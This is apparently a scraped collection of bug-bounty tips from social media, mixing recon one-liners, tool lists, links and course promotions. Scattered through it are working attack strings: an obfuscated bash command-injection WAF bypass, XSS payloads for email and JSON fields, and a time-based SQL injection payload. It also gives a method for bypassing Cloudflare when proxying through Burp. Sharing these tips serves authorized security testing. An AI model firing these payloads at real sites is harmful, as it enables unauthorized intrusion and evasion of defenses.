#bugbountytips Sometimes when you visit a website using burp suite cloudflare stops you, but when you disable the proxy it works. here is how to bypass it using burp suite ✍️ Enable match and replace with the following: pastebin.com/raw/HRZzeZLJ #Cloudflare #BugBounty

I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1

Anti-Forensic Techniques Used By Lazarus Group - ASEC BLOG asec.ahnlab.com/en/48223/

Tools that make my #InfoSec life easy🕵️‍♂️ AFL Burp Suite checkov dirsearch Frida httpx IDA jadx-gui John The Ripper Linux utilities (Netcat/nc, curl, gdb, sed, man, BusyBox, nohup, etc) Metasploit mimikatz MobSF Nessus ngrok Nmap SQLmap WireShark Ysoserial Know more tools? Reply👇

bash command injection #bypass waf $0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'

7. Read the entire writeup below. #pentesting #infosec #appsec #cybersecurity #ethicalhacking #bugbounty #hacking cristivlad.medium.com/exfiltrating-a…

All Common Ports 🌿🥬 Enumerations and Exploitations pentestbook.six2dez.com/enumeration/po…

whenever you saw any email input field! 70% bug hunters don't try XSS there as compared to name field. always try this in email input field! "<img/src/onerror=alert(0)"Josh Holly.com This don't work every time but give it a try found 2 XSS today using this! #bugbountytips

Deepak bug_vs_me Josh Holly You can all the time try this payload : "mitsec<form/><!><details/open/ontoggle=alert(document.domain)>"Gmail.com

Are you tired of the tedious process of installing your bug bounty tools every time you start fresh? 🔍 With reFresh, you can automate the installation of top tools from industry legends like TomNomNom, ProjectDiscovery, Luke Stephens (hakluke), and / XNL -н4cĸ3r (and @xnl-h4ck3r in the new Sky) 💻 github.com/retkoussa/reFr…

GIVEAWAY of my new course "Windows Services for Red Teamers" to 5 people who liked and retweeted this tweet. Winners will be picked on wednesday. redteamsorcery.teachable.com/p/windows-serv… #infosec #Malware #redteam #windows

Final payload: ``0'XOR(if(now()=sysdate(),sleep(4*4),0))XOR'Z.php``. Worth to note: I still couldn't find the if there a real SQL injection or no, both Ghauri and SQLMap fails to detect any possible injections. The Lord WAF is too strong there...

WAF bypasses XSS payload in JSON Payload: ["');alert('XSS');//"]xyz.xyz.xxx #WAF #xss #BugBounty #bugbountytips

#bugbountytip #bugbountytips i found phpmyadmin template on nuclei phpmyadmin-setup.yaml next step edit that template for /admin/ template endpoint was [/pma/setup/index.php] i found 2 on [/admin/pma/setup/index.php] happy hunting ♥ #BugBounty

Trouble figuring out which ASN belongs to a company? This should help ensure you found the correct one.👇 echo tesla .com |subfinder |dnsx -silent -resp-only |sort -u |asnmap -json -silent | jq -r '. | select(.as_name | test("(?i)tesla[a-z]{0,10}$")) | .as_range[]' |sort -u

Want to succeed in bug bounties? Follow these 10 tips! 🧵👇 #bugbounty #hacking #cybersecurity

RCE due to Dependency Confusion — $5000 bounty! by @ChevonPhillip link.medium.com/f1Z8506wTzb

Six Things I Wish I Knew for the OSCP 🧵

This never gets old😂